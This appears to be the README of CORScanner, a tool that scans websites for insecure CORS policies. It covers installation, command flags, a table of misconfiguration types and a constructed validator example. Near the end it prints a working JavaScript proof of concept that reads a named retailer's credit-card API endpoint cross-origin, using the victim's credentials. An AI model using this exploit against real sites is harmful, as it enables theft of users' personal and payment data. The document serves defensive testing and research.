
CORScanner is a Python tool designed to discover CORS misconfiguration vulnerabilities in websites. It helps website administrators and penetration testers check whether the domains/URLs they are targeting have insecure CORS policies.

CORScanner is also available on PyPI (`pip install corscanner` or `pip install cors`).

Two useful references for understanding CORS systematically:
LaTeX version:

```bibtex
@inproceedings{chen-cors,
  author    = {Jianjun Chen and Jian Jiang and Haixin Duan and Tao Wan and Shuo Chen and Vern Paxson and Min Yang},
  title     = {We Still Don{\textquoteright}t Have Secure Cross-Domain Requests: an Empirical Study of {CORS}},
  booktitle = {27th {USENIX} Security Symposium ({USENIX} Security 18)},
  year      = {2018},
  isbn      = {978-1-939133-04-5},
  address   = {Baltimore, MD},
  pages     = {1079--1093},
  url       = {https://www.usenix.org/conference/usenixsecurity18/presentation/chen-jianjun},
  publisher = {{USENIX} Association},
  month     = aug,
}
```

Word version:

Jianjun Chen, Jian Jiang, Haixin Duan, Tao Wan, Shuo Chen, Vern Paxson, and Min Yang. "We Still Don't Have Secure Cross-Domain Requests: an Empirical Study of CORS." In 27th USENIX Security Symposium (USENIX Security 18), pp. 1079-1093. 2018.

![CORScanner in action](https://github.com/chenjj/CORScanner/raw/master/images/screenshot.png)
```shell
git clone https://github.com/chenjj/CORScanner.git
sudo pip install -r requirements.txt
```

CORScanner depends on the requests, gevent, tldextract, colorama and argparse Python modules.

```shell
sudo pip install corscanner
```

or use the short name:

```shell
sudo pip install cors
```

```python
>>> from CORScanner.cors_scan import cors_check
>>> ret = cors_check("https://www.instagram.com", None)
>>> ret
{'url': 'https://www.instagram.com', 'type': 'reflect_origin', 'credentials': 'false', 'origin': 'https://evil.com', 'status_code': 200}
```

You can also use CORScanner via the `corscanner` or `cors` command:

```shell
cors -vu https://www.instagram.com
```
| Short Form | Long Form | Description |
|---|---|---|
| -u | --url | URL/domain whose CORS policy to check |
| -d | --headers | Add headers to the request |
| -i | --input | URL/domain list file to check their CORS policy |
| -t | --threads | Number of threads to use for CORS scan |
| -o | --output | Save the results to json file |
| -v | --verbose | Enable the verbose mode and display results in realtime |
| -T | --timeout | Set requests timeout (default 10 sec) |
| -p | --proxy | Enable proxy (http or socks5) |
| -h | --help | show the help message and exit |
```shell
# Check the CORS policy of a single domain
python cors_scan.py -u example.com
# Enable verbose mode and show results in real time
python cors_scan.py -u example.com -v
# Save the results to a JSON file
python cors_scan.py -u example.com -o output_filename
# Check a specific URL
python cors_scan.py -u [***]
# Add custom headers (e.g. a session cookie) to the requests
python cors_scan.py -u example.com -d "Cookie: test"
# Scan a list of domains/URLs with 100 threads
python cors_scan.py -i top_100_domains.txt -t 100
# Route the requests through an HTTP proxy
python cors_scan.py -u example.com -p http://127.0.0.1:8080
```

To use a socks5 proxy, install PySocks with `pip install PySocks`:

```shell
python cors_scan.py -u example.com -p socks5://127.0.0.1:8080
```

Show the help message:

```shell
python cors_scan.py -h
```
This tool covers the following misconfiguration types:
| Misconfiguration type | Description |
|---|---|
| Reflect_any_origin | Blindly reflects the Origin header value in the Access-Control-Allow-Origin response header, which means any website can read its secrets by sending cross-origin requests. |
| Prefix_match | www.example.com trusts example.com.evil.com, which is an attacker's domain. |
| Suffix_match | www.example.com trusts evilexample.com, which could be registered by an attacker. |
| Not_escape_dot | www.example.com trusts wwwaexample.com, which could be registered by an attacker. |
| Substring_match | www.example.com trusts example.co, which could be registered by an attacker. |
| Trust_null | www.example.com trusts null, which can be forged by iframe sandbox scripts. |
| HTTPS_trust_HTTP | Risky trust dependency: a MITM attacker may steal the HTTPS site's secrets. |
| Trust_any_subdomain | Risky trust dependency: an XSS on any subdomain may steal its secrets. |
| Custom_third_parties | Custom unsafe third-party origins like github.io; see the origins.json file for more. Thanks https://github.com/phackt! |
| Special_characters_bypass | Exploits browsers' handling of special characters. Most only work in Safari, except `_`, which also works in Chrome and Firefox. See more in Advanced CORS Exploitation Techniques. Thanks https://github.com/Malayke. |

Contributions of more misconfiguration types are welcome.

Here is an example of how to exploit the "Reflect_any_origin" misconfiguration on Walmart.com (since fixed). In the video, localhost plays the malicious website.
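To show where the types in the table come from on the server side, here is an added example (not CORScanner's own code) that models each flawed origin-validation pattern as a one-line check, probes it with the attacker-registrable origin the table names, and contrasts it with an exact-allowlist check that accepts none of them. The site name, probe origins and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed example: the only origin this API is supposed to trust.
SITE = "www.example.com"
TRUSTED = "https://" + SITE

def host(origin: str) -> str:
    """Hostname of an Origin header value ("" for the literal 'null')."""
    return urlsplit(origin).hostname or ""

# Server-side origin validators that produce each misconfiguration type in the
# table above. Each returns True when the server would echo the Origin back in
# Access-Control-Allow-Origin (typically with Access-Control-Allow-Credentials: true).
FLAWED_CHECKS = {
    "Reflect_any_origin": lambda o: True,
    "Prefix_match": lambda o: o.startswith(TRUSTED),
    "Suffix_match": lambda o: o.endswith("example.com"),
    "Not_escape_dot": lambda o: re.match(r"^https://www.example.com$", o) is not None,
    "Substring_match": lambda o: "example.co" in o,
    "Trust_null": lambda o: o in (TRUSTED, "null"),
    "HTTPS_trust_HTTP": lambda o: host(o) == SITE,  # scheme is never looked at
    "Trust_any_subdomain": lambda o: host(o) == SITE or host(o).endswith("." + SITE),
}

# One attacker-controllable probe origin per type (constructed; mirrors the table).
PROBES = {
    "Reflect_any_origin": "https://evil.com",
    "Prefix_match": TRUSTED + ".evil.com",
    "Suffix_match": "https://evilexample.com",
    "Not_escape_dot": "https://wwwaexample.com",
    "Substring_match": "https://example.co",
    "Trust_null": "null",
    "HTTPS_trust_HTTP": "http://" + SITE,
    "Trust_any_subdomain": "https://xss.www.example.com",
}

def hardened_check(origin: str) -> bool:
    """Exact, scheme-inclusive allowlist match: 'null' and subdomains never pass."""
    return origin in {TRUSTED}

def audit(check) -> set:
    """Return the misconfiguration types whose probe origin `check` accepts."""
    assert check(TRUSTED), "validator must still accept the legitimate origin"
    return {name for name, origin in PROBES.items() if check(origin)}
```

Running `audit` over each entry of `FLAWED_CHECKS` flags at least its own type, while `audit(hardened_check)` is empty; the fix in every case is an exact match against a fixed list of full origins, never a prefix, suffix, substring or unescaped regex test.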
Walmart.com video on ***:
[![Walmart.com video](https://github.com/chenjj/CORScanner/raw/master/images/walmart.png)]([***])

Here is the exploitation code:

```html
<script>
// Send a cross-origin request to the walmart.com server when a victim visits the page.
var req = new XMLHttpRequest();
req.open('GET', "https://www.walmart.com/account/electrode/account/api/customer/:CID/credit-card", true);
req.onload = stealData;
req.withCredentials = true;
req.send();

function stealData() {
  // Reading the response is allowed because of the CORS misconfiguration.
  var data = JSON.stringify(JSON.parse(this.responseText), null, 2);
  // Display the data on the page. A real attacker can send the data to his server.
  output(data);
}

function output(inp) {
  document.body.appendChild(document.createElement('pre')).innerHTML = inp;
}
</script>
```

Once you understand how the demo works, read Section 5 and Section 6 of the CORS paper to learn how the other misconfigurations can be exploited.

CORScanner is licensed under the MIT license. Take a look at the LICENSE file for more information.

This work is inspired by the following excellent research: